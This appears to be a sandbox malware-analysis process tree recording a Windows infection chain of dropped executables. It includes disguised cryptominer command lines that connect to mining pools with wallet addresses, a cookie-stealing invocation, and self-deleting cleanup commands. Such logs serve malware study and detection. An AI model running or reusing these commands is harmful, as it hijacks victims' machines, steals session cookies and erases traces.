                                                                                                                                            PID:2212
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qdxx0wh.za2\GcleanerWW.exe /mixone & exit
                                                                                                                                        15⤵
                                                                                                                                          PID:7096
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uks3gxcs.mnu\setup_10.2_mix.exe & exit
                                                                                                                                          15⤵
                                                                                                                                            PID:7060
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\uks3gxcs.mnu\setup_10.2_mix.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\uks3gxcs.mnu\setup_10.2_mix.exe
                                                                                                                                              16⤵
                                                                                                                                                PID:6536
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qjde0m2.ky5\file_1.exe & exit
                                                                                                                                              15⤵
                                                                                                                                                PID:7484
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3qjde0m2.ky5\file_1.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3qjde0m2.ky5\file_1.exe
                                                                                                                                                  16⤵
                                                                                                                                                    PID:7292
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
                                                                                                                                                      17⤵
                                                                                                                                                        PID:7600
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                          18⤵
                                                                                                                                                            PID:3104
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe" 1 3.1617944637.606fe03d4056f 101
                                                                                                                                                              19⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              PID:5724
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\EPDFUX02CR\multitimer.exe" 2 3.1617944637.606fe03d4056f
                                                                                                                                                                20⤵
                                                                                                                                                                  PID:4060
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2vz55zzq0bp\2ydqiwlsc0q.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\2vz55zzq0bp\2ydqiwlsc0q.exe" /ustwo INSTALL
                                                                                                                                                                    21⤵
                                                                                                                                                                      PID:6140
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "2ydqiwlsc0q.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\2vz55zzq0bp\2ydqiwlsc0q.exe" & exit
                                                                                                                                                                        22⤵
                                                                                                                                                                          PID:5784
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /im "2ydqiwlsc0q.exe" /f
                                                                                                                                                                            23⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:5900
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wohjak1tosy\app.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\wohjak1tosy\app.exe" /8-23
                                                                                                                                                                        21⤵
                                                                                                                                                                          PID:8120
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\wohjak1tosy\app.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\wohjak1tosy\app.exe" /8-23
                                                                                                                                                                            22⤵
                                                                                                                                                                              PID:6168
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0hbztln3tnv\Setup3310.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\0hbztln3tnv\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                            21⤵
                                                                                                                                                                              PID:5280
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-M7FOB.tmp\Setup3310.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-M7FOB.tmp\Setup3310.tmp" /SL5="$307EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\0hbztln3tnv\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                22⤵
                                                                                                                                                                                  PID:5668
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-S8UQK.tmp\Setup.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-S8UQK.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                    23⤵
                                                                                                                                                                                      PID:6404
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\cauufxfr0sf\setup_10.2_us3.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\cauufxfr0sf\setup_10.2_us3.exe" /silent
                                                                                                                                                                                  21⤵
                                                                                                                                                                                    PID:4108
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9DFM777L59\setups.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\9DFM777L59\setups.exe" ll
                                                                                                                                                                              18⤵
                                                                                                                                                                                PID:6476
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-FBGS5.tmp\setups.tmp
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FBGS5.tmp\setups.tmp" /SL5="$30604,1845714,55808,C:\Users\Admin\AppData\Local\Temp\9DFM777L59\setups.exe" ll
                                                                                                                                                                                  19⤵
                                                                                                                                                                                    PID:5352
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Version.exe"
                                                                                                                                                                                17⤵
                                                                                                                                                                                  PID:8168
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                    18⤵
                                                                                                                                                                                      PID:5220
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                                    17⤵
                                                                                                                                                                                      PID:6288
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1F2E.tmp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1F2E.tmp.exe"
                                                                                                                                                                                        18⤵
                                                                                                                                                                                          PID:5368
                                                                                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13398 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                            19⤵
                                                                                                                                                                                              PID:7392
                                                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13642@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                              19⤵
                                                                                                                                                                                                PID:6464
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
                                                                                                                                                                                              18⤵
                                                                                                                                                                                                PID:7160
                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                                                  19⤵
                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                  PID:4348
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                                                                                                                                                                                              17⤵
                                                                                                                                                                                                PID:3980
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                                                                                                                                                                                                17⤵
                                                                                                                                                                                                  PID:6084
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                      PID:4148
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fwj1nj5f.ojm\app.exe /8-2222 & exit
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                    PID:7512
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\fwj1nj5f.ojm\app.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\fwj1nj5f.ojm\app.exe /8-2222
                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                        PID:4564
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\fwj1nj5f.ojm\app.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\fwj1nj5f.ojm\app.exe" /8-2222
                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                            PID:4216
                                                                                                                                                                                              • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
                                                                                                                                                                                                "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:3888
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-D9RQI.tmp\LabPicV3.tmp
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-D9RQI.tmp\LabPicV3.tmp" /SL5="$10506,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                    PID:4324
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RP7MG.tmp\alpATCHInO.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RP7MG.tmp\alpATCHInO.exe" /S /UID=lab214
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:5936
                                                                                                                                                                                                        • C:\Program Files\Windows Mail\KBJKCNNPIS\prolab.exe
                                                                                                                                                                                                          "C:\Program Files\Windows Mail\KBJKCNNPIS\prolab.exe" /VERYSILENT
                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                            PID:2552
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-2MCQF.tmp\prolab.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-2MCQF.tmp\prolab.tmp" /SL5="$202F2,575243,216576,C:\Program Files\Windows Mail\KBJKCNNPIS\prolab.exe" /VERYSILENT
                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                PID:6920
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\b6-aa581-ba3-23fac-bd3d485c8e13f\Hywucanine.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\b6-aa581-ba3-23fac-bd3d485c8e13f\Hywucanine.exe"
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:6808
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\be-3a814-f82-718bb-8692822d33d7c\Jozhysonera.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\be-3a814-f82-718bb-8692822d33d7c\Jozhysonera.exe"
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:7012
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe & exit
                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                      PID:7940
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe
                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                          PID:2788
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe"
                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                              PID:7480
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\zserxyal.mi0\google-game.exe"
                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                  PID:7668
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                                    19⤵
                                                                                                                                                                                                                                      PID:3988
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gdhrq3t0.oi0\jg8_8qyu.exe & exit
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:7228
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\gdhrq3t0.oi0\jg8_8qyu.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\gdhrq3t0.oi0\jg8_8qyu.exe
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                    PID:8104
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s115azcs.uoc\wwfvd.exe & exit
                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                    PID:5740
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\s115azcs.uoc\wwfvd.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\s115azcs.uoc\wwfvd.exe
                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                        PID:3656
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\s115azcs.uoc\wwfvd.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              PID:6428
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /im wwfvd.exe /f
                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:4876
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                              PID:6272
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mowdooos.hhm\askinstall31.exe & exit
                                                                                                                                                                                                                                        15⤵
                                                                                                                                                                                                                                          PID:5204
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\mowdooos.hhm\askinstall31.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\mowdooos.hhm\askinstall31.exe
                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                              PID:5896
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bvh4tn0v.mor\toolspab1.exe & exit
                                                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                                                              PID:7052
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bvh4tn0v.mor\toolspab1.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\bvh4tn0v.mor\toolspab1.exe
                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                  PID:5988
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bvh4tn0v.mor\toolspab1.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bvh4tn0v.mor\toolspab1.exe
                                                                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                                                                      PID:7700
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5yc421kq.fwb\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xf04o5g0.jcn\setup_10.2_mix.exe & exit
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                      PID:5816
                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4jweolap.mxu\file_1.exe & exit
                                                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                                                        PID:744
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                                            PID:6728
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4jweolap.mxu\file_1.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4jweolap.mxu\file_1.exe
                                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                                              PID:2060
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
                                                                                                                                                                                                                                                                17⤵
                                                                                                                                                                                                                                                                  PID:1576
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                                                                                                                                                    18⤵
                                                                                                                                                                                                                                                                      PID:6004
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe" 1 3.1617944772.606fe0c4e88d4 101
                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                          PID:4456
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\942SY1Q81T\multitimer.exe" 2 3.1617944772.606fe0c4e88d4
                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                              PID:4432
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\nyyh4qwzkbi\app.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\nyyh4qwzkbi\app.exe" /8-23
                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                  PID:5760
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\nyyh4qwzkbi\app.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\nyyh4qwzkbi\app.exe" /8-23
                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                      PID:2380
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\k1wosdkxqox\zpxz34pzzom.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\k1wosdkxqox\zpxz34pzzom.exe" /ustwo INSTALL
                                                                                                                                                                                                                                                                                    21⤵
                                                                                                                                                                                                                                                                                      PID:5888
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "zpxz34pzzom.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\k1wosdkxqox\zpxz34pzzom.exe" & exit
                                                                                                                                                                                                                                                                                        22⤵
                                                                                                                                                                                                                                                                                          PID:1752
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                            taskkill /im "zpxz34pzzom.exe" /f
                                                                                                                                                                                                                                                                                            23⤵
                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                            PID:5784
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jeaeh2k1ewm\Setup3310.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\jeaeh2k1ewm\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                                                                          PID:4052
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-M2JI2.tmp\Setup3310.tmp
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-M2JI2.tmp\Setup3310.tmp" /SL5="$304D4,138429,56832,C:\Users\Admin\AppData\Local\Temp\jeaeh2k1ewm\Setup3310.exe" /Verysilent /subid=577
                                                                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                                                                              PID:7036
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LJEAE.tmp\Setup.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LJEAE.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                                                23⤵
                                                                                                                                                                                                                                                                                                  PID:3984
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ID14FQWA62\setups.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\ID14FQWA62\setups.exe" ll
                                                                                                                                                                                                                                                                                        18⤵
                                                                                                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TC504.tmp\setups.tmp
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-TC504.tmp\setups.tmp" /SL5="$40790,1845714,55808,C:\Users\Admin\AppData\Local\Temp\ID14FQWA62\setups.exe" ll
                                                                                                                                                                                                                                                                                            19⤵
                                                                                                                                                                                                                                                                                              PID:6464
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe"
                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                                                                                                                                              18⤵
                                                                                                                                                                                                                                                                                                PID:8148
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                                                                                                                              17⤵
                                                                                                                                                                                                                                                                                                PID:3956
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\2F80.tmp.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\2F80.tmp.exe"
                                                                                                                                                                                                                                                                                                  18⤵
                                                                                                                                                                                                                                                                                                    PID:5180
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13842 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                                                                                                                                                      19⤵
                                                                                                                                                                                                                                                                                                        PID:5188
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w865@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                                                                                                                                                        19⤵
                                                                                                                                                                                                                                                                                                          PID:6716
                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                                                                                                                              PID:992
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
                                                                                                                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                                                                                                                            PID:4372
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                                                                                                                                                              19⤵
                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                              PID:7560
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
                                                                                                                                                                                                                                                                                                          17⤵
                                                                                                                                                                                                                                                                                                            PID:6288
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX3\gcttt.exe"
                                                                                                                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                                                                                                                              PID:6024
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                                                                                                                  PID:7664
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\2NpbIfzcz6Mh.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\2NpbIfzcz6Mh.exe"
                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                    PID:5048
                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                        PID:3640
